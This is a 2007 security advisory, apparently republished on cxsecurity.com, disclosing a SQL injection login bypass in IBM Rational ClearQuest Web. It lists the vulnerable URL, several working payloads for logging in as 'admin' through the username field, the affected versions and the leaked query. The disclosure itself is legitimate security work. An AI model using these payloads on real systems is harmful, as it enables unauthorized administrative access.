IBM Rational ClearQuest Web SQL Injection Login Bypass

2007.08.16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+==============================================================+ + IBM Rational ClearQuest Web Login Bypass (SQL Injection) + +==============================================================+ DISCOVERED BY: ============== SecureState sasquatch - swhite (at) securestate (dot) com [email concealed] rel1k - dkennedy (at) securestate (dot) com [email concealed] HOMEPAGE: ========= www.securestate.com AFFECTED AREA: =============== The username field on the login page is where the application is susceptible to SQL injection... SAMPLE URL: =========== http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=D ATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/l ogin&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHER E&userDb=DATABASENAMEHERE Log in as "admin": ================== ' OR login_name LIKE '%admin%'-- (other variations work as well) ' OR login_name LIKE 'admin%'-- ' OR LOWER(login_name) LIKE '%admin%'-- ' OR LOWER(login_name) LIKE 'admin%'-- etc...use your imagination... Confirmed against: ================== version 7.0.0.1 Label BALTIC_PATCH.D0609.929 version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630 FULL SQL Statement is spit back in error message: ================================================= SELECT master_users.master_dbid, master_users.login_name, master_users.encrypted_password, master_users.email, master_users.fullname, master_users.phone, master_users.misc_info, master_users.is_active, master_users.is_superuser, master_users.is_appbuilder, master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask FROM master_users WHERE login_name = 'INJECTION GOES HERE


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top